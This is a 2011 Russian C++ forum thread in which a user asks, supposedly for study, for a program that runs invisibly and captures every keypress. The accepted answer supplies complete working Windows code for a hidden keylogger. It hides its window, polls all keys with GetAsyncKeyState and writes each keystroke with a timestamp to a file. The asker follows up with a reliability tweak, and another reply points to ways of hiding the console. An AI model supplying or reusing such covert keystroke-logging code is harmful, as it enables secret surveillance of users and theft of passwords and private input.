Форум программистов, компьютерный форум CyberForum.ru

С++ для начинающих

Войти
Регистрация
Восстановить пароль
 
Van111
кодер с++
208 / 187 / 4
Регистрация: 03.08.2011
Сообщений: 2,587
Записей в блоге: 12
#1

а как сделать так - C++

25.09.2011, 18:55. Просмотров 300. Ответов 4
Метки нет (Все метки)

нужно чтоб при запуске програма работала не как приложение а как процесс то есть юзеру была не видна
и ловила все нажатые пользователям кнопки
(мне это нужно тока в учебных целях)
Лучшие ответы (1)
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
25.09.2011, 18:55     а как сделать так
Посмотрите здесь:

Как сделать так что бы выводило не -1.#IND - C++
#include<iostream> #include<math.h> using namespace std; class A { double x,y,z; double b; public: void...

Как сделать так, что бы программа искала процессы - C++
В общем, хочу сделать так, что бы программа видела процесс, который я ей напишу, типо как с окном, только уже процессы. Пример с окном: ...

Как сделать так что бы функция возвращала строку - C++
Как сделать так что бы функция возвращала строку

Как сделать так что бы массив выводил наоборот - C++
Как сделать так что бы массив выводил наоборот???

Как сделать так чтобы запустить прогу через Ехешник? - C++
Ребят а как сделать так чтобы программу можно было запустить через Exeшник?

Как сделать так, чтобы значения экземпляров класса не повторялись - C++
Я пытаюсь написать игру 2048. Коротко об игре, для тех кто не знает: Есть поле 4х4 в нем появляются на случайной позиции квадратики с...

Как сделать так, чтобы программа понимала русские буквы? - C++
И если знаете как убрать этот огромный массив символов "char mass2" на chr виснет все... Так вот код программы. Мне нужно чтобы...

Как сделать так чтобы вводить с клавиатуры адрес к файлу - C++
#include <stdio.h> #include <conio.h> #include <iostream> using namespace std; int main() { int i=0; char file; ...

Как сделать так, чтобы записывалась строка из букв и цифр? - C++
#include <iostream> #include <windows.h> #include <conio.h> #include <fstream> using namespace std; enum class Keys { ...

Как сделать указатель на структуру и получить так доступ к элементам? - C++
Здравствуйте!Как сделать указатель на структуру и получить так доступ к элементам? #include <iostream> using namespace std; struct...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
После регистрации реклама в сообщениях будет скрыта и будут доступны все возможности форума.
xAtom
914 / 739 / 60
Регистрация: 09.12.2010
Сообщений: 1,346
Записей в блоге: 1
25.09.2011, 22:53     а как сделать так #2
Сообщение было отмечено автором темы, экспертом или модератором как ответ
Цитата Сообщение от Van111 Посмотреть сообщение
нужно чтоб при запуске програма работала не как приложение а как процесс то есть юзеру была не видна
Имеешь ввиду как работают Windows-службы в системах-NT, я вот тут набросал не большой код простого консольного приложения "человека-невидимки" времени нет службу паять, вот код только для ОС Win NT.
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#include <stdio.h>
#include <windows.h>
 
int main(void) {
   SYSTEMTIME  tm;
   int   key;
   FILE* fp;
   HWND  wnd = GetForegroundWindow();
  // уменьшить приоритет процесса
   SetPriorityClass(GetCurrentProcess(), IDLE_PRIORITY_CLASS);
 
  // файл для сохранения информаци о нажатой клавиши
  if(!(fp = fopen("D:\\keys.txt", "w+")))
       exit(1);
  fputs("Символ\tASCII-код\tДата/Время\n", fp);
 
  ShowWindow(wnd, SW_HIDE);
  while(1) {
       for(key = 3; key < 256; key++) {
           if(GetAsyncKeyState(key)) {
                 GetLocalTime(&tm);
                 fprintf(fp, "%c\t%d\t\t%d-%02d-%02d  %02d:%02d:%02d\n", 
                 key, key, tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
                 break;
          }
       }
       // при нажатие на клавишу End(процесс закрывается)
       if(GetAsyncKeyState(35)) 
           break;
       Sleep(100u);
   }
   ShowWindow(wnd, SW_SHOW);
   fflush(fp);
   fclose(fp);
 
   system("pause");
   return 0;
}
При запуске проги она исчезнит и будет сохранять в файл сведения любой нажатой квлавиши в системе, для закрытия процесса клавиша End(с работает в любом месте).
Чистый
Автор FAQ
2692 / 1388 / 71
Регистрация: 08.09.2011
Сообщений: 3,720
Записей в блоге: 1
26.09.2011, 11:22     а как сделать так #3
можно просто скрыть окно консоли, вот тут почитай:
Тыц 1
Тыц 2
Van111
кодер с++
208 / 187 / 4
Регистрация: 03.08.2011
Сообщений: 2,587
Записей в блоге: 12
26.09.2011, 16:36  [ТС]     а как сделать так #4
а зачем уменьшать приоретет процеса?
fflush(fp) надо бы вставить после
fprintf(fp, "%c\t%d\t\t%d-%02d-%02d %02d:%02d:%02d\n",
key, key, tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
так надёжнее
kravam
быдлокодер
1691 / 878 / 44
Регистрация: 04.06.2008
Сообщений: 5,424
26.09.2011, 16:58     а как сделать так #5
Скрыть программу
Yandex
Объявления
26.09.2011, 16:58     а как сделать так
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2017, vBulletin Solutions, Inc.
Рейтинг@Mail.ru